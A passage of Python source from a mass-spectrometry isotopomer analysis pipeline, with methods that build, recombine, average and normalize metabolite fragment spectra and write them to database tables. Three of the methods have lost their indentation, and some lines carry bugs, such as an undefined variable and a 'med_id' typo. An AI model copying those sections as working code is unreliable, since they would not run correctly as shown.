                        sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndDilution_dataStage01Normalized(experiment_id_I,st,tp,dil);
                        sample_abbreviations.extend(sample_abbreviations_tmp);
                for sna_cnt,sna in enumerate(sample_abbreviations):
                    print('Building precursor and product spectrum from isotopomer normalized for sample name abbreviation ' + sna);
                    # get the scan_types
                    if scan_types_I:
                        scan_types = scan_types_I;
                    else:
                        scan_types = [];
                        scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndDilutionAndSampleAbbreviations_dataStage01Normalized(experiment_id_I,tp,dil,sna);
                    for scan_type in scan_types:
                        print('Building precursor and product spectrum for scan type ' + scan_type)
                        # met_ids
                        if not met_ids_I:
                            met_ids = [];
                            met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndDilutionAndScanType_dataStage01Normalized( \
                                experiment_id_I,sna,tp,dil,scan_type);
                        else:
                            met_ids = met_ids_I;
                        if not(met_ids): continue #no component information was found
                        for met in met_ids:
                            print('Building precursor and product spectrum from isotopomer normalized for metabolite ' + met);
                            # get sample names
                            sample_names = [];
                            sample_names,replicate_numbers,sample_types = self.stage01_isotopomer_query.get_sampleNamesAndReplicateNumbersAndSampleTypes_experimentIDAndSampleNameAbbreviationAndMetIDAndTimePointAndDilutionAndScanType_dataStage01Normalized(experiment_id_I,sna,met,tp,dil,scan_type);
                            # iterate through sample names then mets/fragments in order to calculate the spectrum for each sample and component
                            for sn_cnt,sn in enumerate(sample_names):
                                print('Building precursor and product spectrum from isotopomer normalized for sample ' + sn);
                                # get peak data for the sample/met_id/scan_type
                                peak_data = [];
                                peak_data = self.stage01_isotopomer_query.get_data_experimentIDAndSampleNameAndMetIDAndAndScanType_normalized(experiment_id_I,sn,met,scan_type);
                                fragment_formulas = list(peak_data.keys());
                                # re-derive the normalized spectrum from the corrected intensities
                                peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakList_normMax(\
                                    peak_data, fragment_formulas, True);
                                # statistics against the theoretical spectrum
                                peakSpectrum_stats,peakSpectrum_theoretical = self.compare_peakSpectrum_normMax([peakSpectrum_normalized],True);
                                # update data_stage01_isotopomer_normalized
                                for frag,spec in peakSpectrum_theoretical.items():
                                    if spec:
                                        fragment_str = re.sub('[+-]', '', frag);
                                        # NOTE(review): fragment_mass is computed but not used below
                                        fragment_mass = Formula(fragment_str).isotope.mass;
                                        for k,v in peakSpectrum_theoretical[frag].items():
                                            dataListUpdated.append({'experiment_id':experiment_id_I,
                                                'sample_name':sn,
                                                'sample_name_abbreviation':sna,
                                                'sample_type':sample_types[sn_cnt],
                                                'time_point':tp,
                                                'dilution':dil,
                                                'replicate_number':replicate_numbers[sn_cnt],
                                                'met_id':met,
                                                'fragment_formula':frag,
                                                'fragment_mass':int(numpy.round(k)),
                                                'intensity_corrected':peakSpectrum_corrected[frag][k],
                                                'intensity_corrected_units':'cps',
                                                'intensity_normalized':peakSpectrum_normalized[frag][k],
                                                'intensity_normalized_units':'normMax',
                                                'intensity_theoretical':v,
                                                'abs_devFromTheoretical':peakSpectrum_stats[frag][k]['absDev'],
                                                'scan_type':scan_type});
            # push all updated rows for this time-point in a single call
            self.stage01_isotopomer_query.update_data_stage01_isotopomer_normalized(dataListUpdated);
    def execute_recombineNormalizedSpectrum(self,experiment_id_I, sample_names_I = None, sample_name_abbreviations_I = None, met_ids_I = None):
        '''Recombine intensity_normalized from a lower and a higher dilution.

        Only rows tagged with the comment 'Recombine' are processed: the spectra of the
        available dilutions are merged (via recombine_dilutionsMRMs) into a single
        spectrum per sample-name-abbreviation/time-point/scan-type/met/replicate, and
        the rows that are superseded are written back with used_ = False.
        '''
        '''Assumptions:
        only a single fragment:spectrum is used_ per sample name abbreviation, time-point, replicate, scan_type
        (i.e. there are no multiple dilutions of the same precursor:spectrum that are used_)
        '''
        print('execute_recombineNormalizedSpectrum...')
        # get time points
        time_points = self.stage01_isotopomer_query.get_timePoint_experimentIDAndComment_dataStage01Normalized(experiment_id_I,'Recombine');
        for tp in time_points:
            print('recombining spectrum for time-point ' + str(tp));
            # rows to bulk-update for this time-point
            dataListUpdated = [];
            # resolve the sample name abbreviations to process
            if sample_names_I:
                sample_abbreviations = [];
                sample_types = ['Unknown','QC'];
                for sn in sample_names_I:
                    for st in sample_types:
                        sample_abbreviations_tmp = [];
                        sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndSampleNameAndComment_dataStage01Normalized(experiment_id_I,st,tp,sn,'Recombine');
                        sample_abbreviations.extend(sample_abbreviations_tmp);
            elif sample_name_abbreviations_I:
                sample_abbreviations = sample_name_abbreviations_I;
            else:
                # get sample names and sample name abbreviations
                sample_abbreviations = [];
                sample_types = ['Unknown','QC'];
                for st in sample_types:
                    sample_abbreviations_tmp = [];
                    sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndComment_dataStage01Normalized(experiment_id_I,st,tp,'Recombine');
                    sample_abbreviations.extend(sample_abbreviations_tmp);
            for sna_cnt,sna in enumerate(sample_abbreviations):
                print('recombining spectrum for sample name abbreviation ' + sna);
                # get the scan_types
                scan_types = [];
                scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndComment_dataStage01Normalized(experiment_id_I,tp,sna,'Recombine');
                for scan_type in scan_types:
                    print('recombining spectrum for scan type ' + scan_type)
                    # met_ids
                    if not met_ids_I:
                        met_ids = [];
                        met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndComment_dataStage01Normalized( \
                                experiment_id_I,sna,tp,scan_type,'Recombine');
                    else:
                        met_ids = met_ids_I;
                    if not(met_ids): continue #no component information was found
                    for met in met_ids:
                        print('recombining spectrum for metabolite ' + met);
                        # get replicates
                        replicate_numbers = [];
                        replicate_numbers = self.stage01_isotopomer_query.get_replicateNumbers_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetID_dataStage01Normalized( \
                                experiment_id_I,sna,tp,scan_type,met);
                        for rep in replicate_numbers:
                            print('recombining spectrum for replicate_number ' + str(rep));
                            #get data
                            peakData_I = {};
                            peakData_I = self.stage01_isotopomer_query.get_data_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetIDAndReplicateNumber_dataStage01Normalized( \
                                experiment_id_I,sna,tp,scan_type,met,rep);
                            # merge the dilutions: rows kept, rows superseded, merged intensities
                            peakData_O,peakData_O_false,peakData_intensities_O = self.recombine_dilutionsMRMs(peakData_I);
                            peakSpectrum_stats = self.compare_peakSpectrum_normMax([peakData_intensities_O]);
                            # update data_stage01_isotopomer_normalized (rows kept after recombination)
                            for frag,spec in peakSpectrum_stats.items():
                                if spec:
                                    fragment_str = re.sub('[+-]', '', frag);
                                    # NOTE(review): fragment_mass is computed but not used below
                                    fragment_mass = Formula(fragment_str).isotope.mass;
                                    for k,v in peakSpectrum_stats[frag].items():
                                        if int(numpy.round(k)) in peakData_O[frag]:
                                            dataListUpdated.append({'experiment_id':experiment_id_I,
                                                'sample_name_abbreviation':sna,
                                                'time_point':tp,
                                                'dilution':peakData_O[frag][int(numpy.round(k))]['dilution'],
                                                'replicate_number':rep,
                                                'met_id':met,
                                                'fragment_formula':frag,
                                                'fragment_mass':int(numpy.round(k)),
                                                'intensity_normalized':peakData_O[frag][int(numpy.round(k))]['intensity'],
                                                'intensity_normalized_units':'normMax',
                                                'abs_devFromTheoretical':v['absDev'],
                                                'scan_type':scan_type,
                                                'used_':peakData_O[frag][int(numpy.round(k))]['used_'],
                                                'comment_':peakData_O[frag][int(numpy.round(k))]['comment_']});
                            # update data_stage01_isotopomer_normalized (rows changed to false)
                            for frag,spec in peakData_O_false.items():
                                if spec:
                                    fragment_str = re.sub('[+-]', '', frag);
                                    # NOTE(review): fragment_mass is computed but not used below
                                    fragment_mass = Formula(fragment_str).isotope.mass;
                                    for k,v in peakData_O_false[frag].items():
                                        if v:
                                            dataListUpdated.append({'experiment_id':experiment_id_I,
                                                'sample_name_abbreviation':sna,
                                                'time_point':tp,
                                                'dilution':v['dilution'],
                                                'replicate_number':rep,
                                                'met_id':met,
                                                'fragment_formula':frag,
                                                'fragment_mass':int(numpy.round(k)),
                                                'intensity_normalized':v['intensity'],
                                                'intensity_normalized_units':'normMax',
                                                'abs_devFromTheoretical':None,
                                                'scan_type':scan_type,
                                                'used_':v['used_'],
                                                'comment_':v['comment_']});
            # push all updated rows for this time-point in a single call
            self.stage01_isotopomer_query.update_data_stage01_isotopomer_normalized(dataListUpdated);
def execute_analyzeAverages(self,experiment_id_I, sample_names_I = None, sample_name_abbreviations_I = None, met_ids_I = None, scan_types_I = None):
'''calculate the average normalized intensity for MRM samples'''
'''Assumptions:
only a single fragment:spectrum is used_ per sample name abbreviation, time-point, replicate, scan_type
(i.e. there are no multiple dilutions of the same precursor:spectrum that are used_)
'''
print('execute_analyzeAverages...')
# get time points
time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01Normalized(experiment_id_I);
for tp in time_points:
print('Calculating average precursor and product spectrum from isotopomer normalized for time-point ' + str(tp));
if sample_names_I:
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for sn in sample_names_I:
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndSampleName_dataStage01Normalized(experiment_id_I,st,tp,sn);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
elif sample_name_abbreviations_I:
sample_abbreviations = sample_name_abbreviations_I;
sample_types_lst = ['Unknown' for x in sample_abbreviations];
# query sample types from sample name abbreviations and time-point from data_stage01_isotopomer_normalized
else:
# get sample names and sample name abbreviations
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01Normalized(experiment_id_I,st,tp);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
for sna_cnt,sna in enumerate(sample_abbreviations):
print('Calculating average precursor and product spectrum from isotopomer normalized for sample name abbreviation ' + sna);
# get the scan_types
if scan_types_I:
scan_types = [];
scan_types_tmp = [];
scan_types_tmp = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
scan_types = [st for st in scan_types_tmp if st in scan_types_I];
else:
scan_types = [];
scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
for scan_type in scan_types:
print('Calculating average precursor and product spectrum for scan type ' + scan_type)
# met_ids
if not met_ids_I:
met_ids = [];
met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01Normalized( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type);
else:
met_ids = met_ids_I;
if not(met_ids): continue #no component information was found
for met in met_ids:
print('Calculating average precursor and product spectrum for metabolite ' + met);
## get fragment formulas and masses
#fragment_formulas, fragment_masses = [],[];
#fragment_formulas,fragment_masses = self.stage01_isotopomer_query.get_fragmentFormulasAndMass_experimentIDAndSampleAbbreviationAndTimePointAndAndSampleTypeAndScanTypeAndMetID_dataStage01Normalized(experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type,met);
#for mass_cnt,mass in enumerate(fragment_masses):
# print 'Calculating average precursor and product spectrum for fragment/mass ' + fragment_formulas[mass_cnt] + '/' + str(mass);
# # get data
# intensities = [];
# intensities = self.stage01_isotopomer_query.get_normalizedIntensity_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndMetIDAndFragmentFormulaAndMassAndScanType_dataStage01Normalized(experiment_id_I,sna,tp,sample_types_lst[sna_cnt],met,fragment_formulas[mass_cnt],mass,scan_type);
# # calculate the average and cv
# n_replicates = len(intensities);
# intensities_average = 0.0;
# intensities_var = 0.0;
# intensities_cv = 0.0;
# # calculate average and CV of intensities
# if (not(intensities)):
# #continue
# intensities_average = 0.0;
# intensities_var = 0.0;
# intensities_cv = 0.0;
# elif n_replicates<2: # require at least 2 replicates
# #continue
# intensities_average = 0.0;
# intensities_var = 0.0;
# intensities_cv = 0.0;
# else:
# intensities_average = numpy.mean(numpy.array(intensities));
# intensities_var = numpy.var(numpy.array(intensities));
# if (intensities_average <= 0.0): intensities_cv = 0.0;
# else: intensities_cv = sqrt(intensities_var)/intensities_average*100;
# # calculate the theoretical spectrum for the pecursor/mass
# peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax([fragment_formulas[mass_cnt]],True);
# # calculate the absolute deviation from the theoretical
# intensity_theoretical = peakSpectrum_theoretical[fragment_formulas[mass_cnt]][mass];
# if intensity_theoretical > 0.0:abs_devFromTheoretical = abs(intensity_theoretical-intensities_average)/intensity_theoretical*100;
# else: abs_devFromTheoretical = None;
# # add to data_stage01_isotopomer_averages
# row = [];
# row = data_stage01_isotopomer_averages(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,fragment_formulas[mass_cnt], mass,
# n_replicates, intensities_average, intensities_cv,
# 'normMax', intensity_theoretical, abs_devFromTheoretical, scan_type, True)
# self.session.add(row);
# get replicates
replicate_numbers = [];
replicate_numbers = self.stage01_isotopomer_query.get_replicateNumbers_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetID_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met);
peakSpectrum_normalized_lst = [];
for rep in replicate_numbers:
print('Calculating average precursor and product spectrum for replicate_number ' + str(rep));
#get data
peakData_I = {};
peakData_I = self.stage01_isotopomer_query.get_dataNormalized_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetIDAndReplicateNumber_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met,rep);
fragment_formulas = list(peakData_I.keys());
peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakList_normMax(\
peakData_I, fragment_formulas, True);
peakSpectrum_normalized_lst.append(peakSpectrum_normalized);
peakSpectrum_stats,peakSpectrum_theoretical = self.compare_peakSpectrum_normMax(peakSpectrum_normalized_lst,True);
# update data_stage01_isotopomer_averages
for frag,spec in peakSpectrum_theoretical.items():
if spec:
fragment_str = re.sub('[+-]', '', frag);
fragment_mass = Formula(fragment_str).isotope.mass;
for k,v in peakSpectrum_theoretical[frag].items():
if v and k in peakSpectrum_stats[frag]:
if peakSpectrum_stats[frag][k]['mean']> 0.0: intensities_cv = peakSpectrum_stats[frag][k]['stdDev']/peakSpectrum_stats[frag][k]['mean']*100;
else: intensities_cv = 0.0;
row = [];
row = data_stage01_isotopomer_averages(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,frag, k,
peakSpectrum_stats[frag][k]['n'], peakSpectrum_stats[frag][k]['mean'], intensities_cv,
'normMax', v, peakSpectrum_stats[frag][k]['absDev'], scan_type, True);
elif v and k not in peakSpectrum_stats[frag]:
intensities_cv = None;
row = [];
row = data_stage01_isotopomer_averages(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,frag, k,
None, None, intensities_cv,
'normMax', v, None, scan_type, True);
elif not v and k in peakSpectrum_stats[frag]:
if peakSpectrum_stats[frag][k]['mean']> 0.0: intensities_cv = peakSpectrum_stats[frag][k]['stdDev']/peakSpectrum_stats[frag][k]['mean']*100;
else: intensities_cv = 0.0;
row = [];
row = data_stage01_isotopomer_averages(experiment_id_I, sna, sample_types_lst[sna_cnt], tp, met,frag, k,
peakSpectrum_stats[frag][k]['n'], peakSpectrum_stats[frag][k]['mean'], intensities_cv,
'normMax', None, peakSpectrum_stats[frag][k]['absDev'], scan_type, True);
self.session.add(row);
self.session.commit();
    def execute_buildSpectrumFromPeakData(self,experiment_id_I,ms_methodtype_I='isotopomer_13C',sample_name_abbreviations_I = None,met_ids_I = None):
        '''Build the precursor/product spectrum from raw peak data.

        For each sample and scan type, extracts the peak spectrum for every
        met_id/precursor, normalizes it, compares it against the theoretical
        spectrum, and inserts the rows into data_stage01_isotopomer_peakSpectrum.

        Args:
            experiment_id_I: id of the experiment to process
            ms_methodtype_I: MS method type (default 'isotopomer_13C');
                NOTE(review): currently unused in the body
            sample_name_abbreviations_I: optional list of sample name abbreviations
            met_ids_I: optional list of metabolite ids
        '''
        '''Assumptions:
        Only 1 precursur:spectrum per sample name and
        only 1 precursor:spectrum per dilution
        (i.e. the best/most representative precursor:spectrum was chose from the
        available EPI scans and dilutions of that particular precursor)
        '''
        # extract out the peakSpectrum
        # get sample names for the experiment
        print('execute_buildSpectrumFromPeakData...')
        if sample_name_abbreviations_I:
            sample_names = [];
            sample_types = ['Unknown','QC'];
            sample_types_lst = [];
            for sna in sample_name_abbreviations_I:
                for st in sample_types:
                    sample_names_tmp = [];
                    sample_names_tmp = self.stage01_isotopomer_query.get_sampleNames_experimentIDAndSampleTypeAndSampleNameAbbreviation_peakData(experiment_id_I,st,sna);
                    sample_names.extend(sample_names_tmp);
                    sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
        else:
            sample_names = [];
            sample_types = ['Unknown','QC'];
            sample_types_lst = [];
            for st in sample_types:
                sample_names_tmp = [];
                sample_names_tmp = self.stage01_isotopomer_query.get_sampleNames_experimentIDAndSampleType_peakData(experiment_id_I,st);
                sample_names.extend(sample_names_tmp);
                sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
        # create database table
        for sn_cnt,sn in enumerate(sample_names):
            print('building spectrum for sample ' + sn);
            # get other information about the sample for later use
            sample_name_abbreviation,time_point,replicate_numbers = None,None,None;
            sample_name_abbreviation,time_point,replicate_numbers = self.stage01_isotopomer_query.get_sampleNameAbbreviationsAndOther_experimentIDAndSampleName_peakData(experiment_id_I,sn);
            # get met_id and precursor_formula for each sample
            scan_type = [];
            scan_type = self.stage01_isotopomer_query.get_scanType_experimentIDAndSampleName_peakData(experiment_id_I,sn);
            for scantype in scan_type:
                print('building spectrum for scan type ' + scantype);
                # get met_id and precursor formula for each sample
                if met_ids_I:
                    met_id, precursor_formula = [], [];
                    for met in met_ids_I:
                        met_id_tmp, precursor_formula_tmp = [], []
                        met_id_tmp, precursor_formula_tmp = self.stage01_isotopomer_query.get_metIDAndPrecursorFormula_experimentIDAndSampleNameAndScanTypeAndMetID_peakData(experiment_id_I,sn,scantype,met);
                        met_id.extend(met_id_tmp);
                        precursor_formula.extend(precursor_formula_tmp);
                else:
                    met_id, precursor_formula = [], [];
                    met_id, precursor_formula = self.stage01_isotopomer_query.get_metIDAndPrecursorFormula_experimentIDAndSampleNameAndScanType_peakData(experiment_id_I,sn,scantype);
                for precursor_cnt, precursor in enumerate(precursor_formula):
                    print('building spectrum for met_id/precursor ' + met_id[precursor_cnt] + '/' + precursor);
                    # mass of the precursor (charge signs stripped for the formula parser)
                    precursor_str = re.sub('[+-]', '', precursor);
                    precursor_mass = Formula(precursor_str).isotope.mass
                    # get all product fragments for the met_id/precursor
                    precursor_formulas_monoisotopic, product_formulas = [], [];
                    precursor_formulas_monoisotopic, product_formulas = self.stage01_isotopomer_query.get_precursorAndProductFormulas_metID(met_id[precursor_cnt],'-','tuning');
                    product_formulas.append(precursor_formulas_monoisotopic[0]); # add precursor to list of fragments
                    # get peak data for the sample/met_id/precursor_formula
                    peak_data = [];
                    peak_data = self.stage01_isotopomer_query.get_data_experimentIDAndSampleNameAndMetIDAndPrecursorFormulaAndScanType_peakData(experiment_id_I,sn,met_id[precursor_cnt],precursor,scantype);
                    # measured/corrected/normalized spectra; 0.3 is a threshold passed to
                    # extract_peakData_normMax (semantics defined there — TODO confirm)
                    peakSpectrum_measured,\
                        peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakData_normMax(\
                        peak_data, product_formulas, 0.3, True);
                    peakSpectrum_stats,peakSpectrum_theoretical = self.compare_peakSpectrum_normMax([peakSpectrum_normalized],True);
                    # update data_stage01_isotopomer_normalized
                    for frag,spec in peakSpectrum_theoretical.items():
                        if spec:
                            product_str = re.sub('[+-]', '', frag);
                            # NOTE(review): product_mass is computed but not used below
                            product_mass = Formula(product_str).isotope.mass;
                            for k,v in peakSpectrum_theoretical[frag].items():
                                row1 = None;
                                row1 = data_stage01_isotopomer_peakSpectrum(experiment_id_I,sn,sample_name_abbreviation,
                                        sample_types_lst[sn_cnt],time_point,replicate_numbers,
                                        met_id[precursor_cnt],precursor,int(numpy.round(precursor_mass)),
                                        frag,int(numpy.round(k)),
                                        peakSpectrum_measured[frag][k],'cps',
                                        peakSpectrum_corrected[frag][k],'cps',
                                        peakSpectrum_normalized[frag][k],'normMax',
                                        v,peakSpectrum_stats[frag][k]['absDev'],scantype,True,None);
                                self.session.add(row1);
        self.session.commit();
    def execute_updatePeakSpectrum(self,experiment_id_I,sample_name_abbreviations_I = None):
        '''Re-calculate intensity_normalized from intensity_corrected and the used flag.

        Mirrors execute_buildSpectrumFromPeakData, but reads its input from
        data_stage01_isotopomer_peakSpectrum and writes the results back as a
        single bulk update instead of inserting new rows.

        Args:
            experiment_id_I: id of the experiment to process
            sample_name_abbreviations_I: optional list of sample name abbreviations
        '''
        # extract out the peakSpectrum
        # rows to bulk-update for the whole experiment
        dataListUpdated = [];
        # get sample names for the experiment
        print('execute_updatePeakSpectrum...')
        if sample_name_abbreviations_I:
            sample_names = [];
            sample_types = ['Unknown','QC'];
            sample_types_lst = [];
            for sna in sample_name_abbreviations_I:
                for st in sample_types:
                    sample_names_tmp = [];
                    sample_names_tmp = self.stage01_isotopomer_query.get_sampleNames_experimentIDAndSampleTypeAndSampleNameAbbreviation_peakSpectrum(experiment_id_I,st,sna);
                    sample_names.extend(sample_names_tmp);
                    sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
        else:
            sample_names = [];
            sample_types = ['Unknown','QC'];
            sample_types_lst = [];
            for st in sample_types:
                sample_names_tmp = [];
                sample_names_tmp = self.stage01_isotopomer_query.get_sampleNames_experimentIDAndSampleType_peakSpectrum(experiment_id_I,st);
                sample_names.extend(sample_names_tmp);
                sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
        # create database table
        for sn_cnt,sn in enumerate(sample_names):
            print('updating peak spectrum for sample ' + sn);
            # get other information about the sample for later use
            sample_name_abbreviation,time_point,replicate_numbers = None,None,None;
            sample_name_abbreviation,time_point,replicate_numbers = self.stage01_isotopomer_query.get_sampleNameAbbreviationsAndTimePointAndReplicateNumber_experimentIDAndSampleName_peakSpectrum(experiment_id_I,sn);
            # get met_id and precursor_formula for each sample
            scan_type = [];
            scan_type = self.stage01_isotopomer_query.get_scanType_experimentIDAndSampleName_peakSpectrum(experiment_id_I,sn);
            for scantype in scan_type:
                print('building spectrum for scan type ' + scantype);
                # get met_id and precursor formula for each sample
                met_id, precursor_formula = [], [];
                met_id, precursor_formula = self.stage01_isotopomer_query.get_metIDAndPrecursorFormula_experimentIDAndSampleNameAndScanType_peakSpectrum(experiment_id_I,sn,scantype);
                for precursor_cnt, precursor in enumerate(precursor_formula):
                    print('updating peak spectrum for met_id/precursor ' + met_id[precursor_cnt] + '/' + precursor);
                    # mass of the precursor (charge signs stripped for the formula parser)
                    precursor_str = re.sub('[+-]', '', precursor);
                    precursor_mass = Formula(precursor_str).isotope.mass
                    # get all product fragments for the met_id/precursor
                    precursor_formulas_monoisotopic, product_formulas = [], [];
                    precursor_formulas_monoisotopic, product_formulas = self.stage01_isotopomer_query.get_precursorAndProductFormulas_metID(met_id[precursor_cnt],'-','tuning');
                    product_formulas.append(precursor_formulas_monoisotopic[0]); # add precursor to list of fragments
                    # get peak data for the sample/met_id/precursor_formula
                    peak_data = [];
                    peak_data = self.stage01_isotopomer_query.get_data_experimentIDAndSampleNameAndMetIDAndPrecursorFormulaAndScanType_peakSpectrum(experiment_id_I,sn,met_id[precursor_cnt],precursor,scantype);
                    # re-derive the normalized spectrum from the corrected intensities
                    peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakList_normMax(\
                        peak_data, product_formulas,True);
                    peakSpectrum_stats,peakSpectrum_theoretical = self.compare_peakSpectrum_normMax([peakSpectrum_normalized],True);
                    # update data_stage01_isotopomer_peakSpectrum
                    for frag,spec in peakSpectrum_theoretical.items():
                        if spec:
                            product_str = re.sub('[+-]', '', frag);
                            # NOTE(review): product_mass is computed but not used below
                            product_mass = Formula(product_str).isotope.mass;
                            for k,v in peakSpectrum_theoretical[frag].items():
                                dataListUpdated.append({'experiment_id':experiment_id_I,
                                    'sample_name':sn,
                                    'sample_name_abbreviation':sample_name_abbreviation,
                                    'sample_type':sample_types_lst[sn_cnt],
                                    'time_point':time_point,
                                    'replicate_number':replicate_numbers,
                                    'met_id':met_id[precursor_cnt],
                                    'precursor_formula':precursor,
                                    'precursor_mass':int(numpy.round(precursor_mass)),
                                    'product_formula':frag,
                                    'product_mass':int(numpy.round(k)),
                                    'intensity_corrected':peakSpectrum_corrected[frag][k],
                                    'intensity_corrected_units':'cps',
                                    'intensity_normalized':peakSpectrum_normalized[frag][k],
                                    'intensity_normalized_units':'normMax',
                                    'intensity_theoretical':v,
                                    'abs_devFromTheoretical':peakSpectrum_stats[frag][k]['absDev'],
                                    'scan_type':scantype});
        # push all updated rows in a single call
        self.stage01_isotopomer_query.update_data_stage01_isotopomer_peakSpectrum(dataListUpdated);
def execute_filterValidatedFragments(self,experiment_id_I):
'''Filter fragments that have been validated by a U12C reference experiment'''
print('filtering validated met/fragment pairs...')
dataUpdate_O = [];
for k,v in self.isotopomer_13C_fragments_validated.items():
for frag in v:
dataUpdate_O.append({'experiment_id':experiment_id_I,'met_id':k,'product_formula':frag});
self.stage01_isotopomer_query.update_validFragments_stage01_isotopomer_peakSpectrum(dataUpdate_O);
def execute_normalizeSpectrumFromReference(self,experiment_id_I,sample_name_abbreviations_I = None, use_mrm_ref = True, met_ids_I = None):
# 1. import used peak spectrum to normalized table after multiplying by measured
# scaling factor calculated from used MRM spectrum
# 2. be sure that the MRMs in the normalized table have been finalized
'''NOTES:
cannot follow the forloop pattern used in buildSpectrumFromPeakData (i.e. starting with sample name)
must use the forloop pattern similar to updateNormalizedSpectrum, but without a forloop for dilutions
(i.e. time-point to sample name abbreviations to scan types to mets)
buildSpectrumFromPeakData and updatePeakSpectrum methods process one product:spectrum from a single precursor at a time;
each precursor:product:spectrum is associated with only one sample name
However, because the entire range of precursor:product:spectrum for a given met can encompass multiple dilutions and therefore different
sample names, a more generic approach must be used'''
'''Assumptions:
only a single precursor:spectrum is used_ per sample name abbreviation, time-point, replicate, scan_type
(i.e. there are no multiple dilutions of the same precursor:spectrum that are used_)
'''
# extract out the peakSpectrum
print('execute_normalizeSpectrumFromReference...')
# get time points
time_points = [];
time_points = self.stage01_isotopomer_query.get_timePoints_experimentID_peakSpectrum(experiment_id_I);
for tp in time_points:
print('normalizing peak spectrum from reference for time-point ' + tp);
# get sample name abbreviations
if sample_name_abbreviations_I:
sample_name_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_name_abbreviations_tmp = [];
sample_name_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_peakSpectrum(experiment_id_I,st,tp);
sample_name_abbreviations.extend([sna for sna in sample_name_abbreviations_tmp if sna in sample_name_abbreviations_I]);
sample_types_lst.extend([st for sna in sample_name_abbreviations_tmp if sna in sample_name_abbreviations_I]);
else:
sample_name_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_name_abbreviations_tmp = [];
sample_name_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_peakSpectrum(experiment_id_I,st,tp);
sample_name_abbreviations.extend(sample_name_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_name_abbreviations_tmp))]);
for sna_cnt,sna in enumerate(sample_name_abbreviations):
print('normalizing peak spectrum from reference for sample name abbreviation ' + sna);
# get scan types
scan_type = [];
scan_type = self.stage01_isotopomer_query.get_scanType_experimentIDAndTimePointSampleNameAbbreviation_peakSpectrum(experiment_id_I,tp,sna);
for scantype in scan_type:
print('normalizing peak spectrum from reference for scan type ' + scantype);
# get replicates
replicate_numbers = [];
replicate_numbers = self.stage01_isotopomer_query.get_replicateNumber_experimentIDAndTimePointAndSampleNameAbbreviationAndScanType_peakSpectrum(experiment_id_I,tp,sna,scantype);
for rep in replicate_numbers:
print('normalizing peak spectrum from reference for replicate ' + str(rep));
# get other information about the sample for later use
sample_name, dilution = None,None;
sample_name,dilution = self.stage01_isotopomer_query.get_sampleNameAndDilution_experimentIDAndTimePointAndSampleNameAbbreviationAndScanType_peakSpectrum(\
experiment_id_I,tp,sna,scantype,rep);
# get met_id
if met_ids_I:
met_id = met_ids_I;
else:
med_id = [];
met_id = self.stage01_isotopomer_query.get_metID_experimentIDAndTimePointAndSampleNameAbbreviationAndScanTypeAndReplicate_peakSpectrum(\
experiment_id_I,tp,sna,scantype,rep);
for met_cnt,met in enumerate(met_id):
print('normalizing peak spectrum from reference for met_id ' + met);
# get precursor formula and mass
precursor_formula, precursor_mass = [], [];
